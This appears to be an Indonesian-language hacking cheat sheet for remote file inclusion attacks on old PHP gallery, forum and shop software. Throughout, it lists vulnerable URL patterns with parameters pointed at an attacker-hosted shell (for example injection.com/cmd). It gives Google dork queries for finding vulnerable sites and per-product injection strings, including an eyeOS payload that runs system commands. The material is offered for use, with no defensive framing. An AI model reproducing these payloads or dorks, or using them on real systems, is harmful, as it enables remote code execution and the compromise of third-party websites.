http://makemenutt.com/cc.txt Exploit :- # # http://[target]/[path]/addfav.php?PP_PATH=[Attack Shell]? # http://[target]/[path]/adm-admlog.php?PP_PATH=[Attack Shell]? # http://[target]/[path]/adm-approve.php?PP_PATH=[Attack Shell]? # http://[target]/[path]/adm-backup.php?PP_PATH=[Attack Shell]? # http://[target]/[path]/adm-cats.php?PP_PATH=[Attack Shell]? # http://[target]/[path]/adm-cinc.php?PP_PATH=[Attack Shell]? # http://[target]/[path]/adm-db.php?PP_PATH=[Attack Shell]? # http://[target]/[path]/adm-editcfg.php?PP_PATH=[Attack Shell]? # http://[target]/[path]/adm-inc.php?PP_PATH=[Attack Shell]? # http://[target]/[path]/adm-index.php?PP_PATH=[Attack Shell]? # http://[target]/[path]/adm-modcom.php?PP_PATH=[Attack Shell]? # http://[target]/[path]/adm-move.php?PP_PATH=[Attack Shell]? # http://[target]/[path]/adm-options.php?PP_PATH=[Attack Shell]? # http://[target]/[path]/adm-order.php?PP_PATH=[Attack Shell]? # http://[target]/[path]/adm-pa.php?PP_PATH=[Attack Shell]? # http://[target]/[path]/adm-photo.php?PP_PATH=[Attack Shell]? # http://[target]/[path]/adm-purge.php?PP_PATH=[Attack Shell]? # http://[target]/[path]/adm-style.php?PP_PATH=[Attack Shell]? # http://[target]/[path]/adm-templ.php?PP_PATH=[Attack Shell]? # http://[target]/[path]/adm-userg.php?PP_PATH=[Attack Shell]? # http://[target]/[path]/adm-users.php?PP_PATH=[Attack Shell]? # http://[target]/[path]/bulkupload.php?PP_PATH=[Attack Shell]? # http://[target]/[path]/cookies.php?PP_PATH=[Attack Shell]? # http://[target]/[path]/comments.php?PP_PATH=[Attack Shell]? # http://[target]/[path]/ecard.php?PP_PATH=[Attack Shell]? # http://[target]/[path]/editphoto.php?PP_PATH=[Attack Shell]? # http://[target]/[path]/register.php?PP_PATH=[Attack Shell]? # http://[target]/[path]/showgallery.php?PP_PATH=[Attack Shell]? # http://[target]/[path]/showmembers.php?PP_PATH=[Attack Shell]? # http://[target]/[path]/useralbums.php?PP_PATH=[Attack Shell]? # http://[target]/[path]/uploadphoto.php?PP_PATH=[Attack Shell]? # http://[target]/[path]/search.php?PP_PATH=[Attack Shell]? # http://[target]/[path]/adm-menu.php?PP_PATH=[Attack Shell]? ================================================================== Untuk forum : allinurl:my_egallery site:.org allinurl:xgallery site:.org allinurl:coppermine site:.org allinurl:4nAlbum site:.org allinurl:PNphpBB2 site:.org allinurl:ihm.php?p= allinurl:.php?bodyfile= allinurl:/default.php?page=home allinurl:/folder.php?id= allinurl:main.php?pagina= allinurl:/modules.php?name=allmyguests allinurl:AshNews atau allinurl: /ashnews.php allinurl:ihm.php?p=* allinurl:kietu/hit_js.php allinurl:/Popper/index.php? keyword : "Powered by phpBB 2.0.6" keyword : "powered by CubeCart 3.0.6" keyword : "powered by paBugs 2.0 Beta 3" Keyword : "powered by AllMyLinks" keyword : /phorum/login.php keyword : "powered eyeOs" allinurl:/includes/orderSuccess.inc.php?glob= allinurl:modules.php?name=Forums Harap diperhatikan bahwa masih banyak alternatif yang lain yang bisa digunakan sebagai keyword. Kalo memang rajin coba liat ajah listnya di : -= http://www.geocities.com/k4k3_rgb/list.txt =- 4. Nah cara kamu menginject adalah dengan index.php?page=http://www.jasakom.com atau kalau kamu tidak berhasil coba dengan list berikut : Ganti modul : 1. my_egallery: /modules/My_eGallery/public/displayCategory.php?basepath= 2. xgallery: /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR= 3. coppermine: /modules/coppermine/themes/default/theme.php?THEME_DIR 4. 4nAlbum: /modules/4nAlbum/public/displayCategory.php?basepath= 5. PNphpBB2 /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path= 6. AllMyGuests: /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]= 7. /Popper/index.php? : /Popper/index.php?childwindow.inc.php?form= 8. kietu : kietu/index.php?kietu[url_hit]= 9. "Powered by phpBB 2.0.6" : &highlight=%2527.include($_GET[a]),exit.%2527&a= 10. "powered by CubeCart 3.0.6" : /includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]= 11. "powered by paBugs 2.0 Beta 3" : /class.mysql.php?path_to_bt_dir= 12. "powered by AllMyLinks" : /include/footer.inc.php?_AMLconfig[cfg_serverpath]= 13. /phorum/login.php : /phorum/plugin/replace/plugin.php?PHORUM[settings_dir]= 14. "powered eyeOs" : /eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions.eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5beyeOptions.eyeapp%5d%5bwrapup%5d=system($cmd);&cmd=id diganti dengan : /eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions.eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5beyeOptions.eyeapp%5d%5bwrapup%5d=include($_GET%5ba%5d);&a= 15. /includes/orderSuccess.inc.php?glob : http://[target]/[path]/includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]= 16 allinurl:modules.php?name=Forums : /modules.php?name= ============================================================================= http://www.target.com/admin_modules/admin_module_captions.inc.php?config[path_src_include]=http://www.injection.com/cmd? http://www.target.com/admin_modules/admin_module_rotimage.inc.php?config[path_src_include]=http://www.injection.com/cmd? http://www.target.com/admin_modules/admin_module_delcomments.inc.php?config[path_src_include]=http://www.injection.com/cmd? http://www.target.com/admin_modules/admin_module_edit.inc.php?config[path_src_include]=http://www.injection.com/cmd? http://www.target.com/admin_modules/admin_module_delimage.inc.php?config[path_src_include]=http://www.injection.com/cmd? http://www.target.com/admin_modules/admin_module_deldir.inc.php?config[path_src_include]=http://www.injection.com/cmd? http://www.target.com/src/index_overview.inc.php?config[path_src_include]=http://www.injection.com/cmd? http://www.target.com/src/image-gd.class.php?config[path_src_include]=http://www.injection.com/cmd? http://www.target.com/src/album.class.php?config[path_src_include]=http://www.injection.com/cmd? http://www.target.com/src/show_random.inc.php?config[path_src_include]=http://www.injection.com/cmd? http://www.target.com/src/main.inc.php?config[path_src_include]=http://www.injection.com/cmd? http://www.target.com/src/index_passwd-admin.inc.php?admin_ok=1&config[path_admin_include]=http://www.injection.com/cmd?